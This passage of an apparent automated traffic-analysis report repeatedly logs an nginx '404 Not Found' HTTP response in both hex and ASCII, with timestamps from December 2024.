2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:35:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 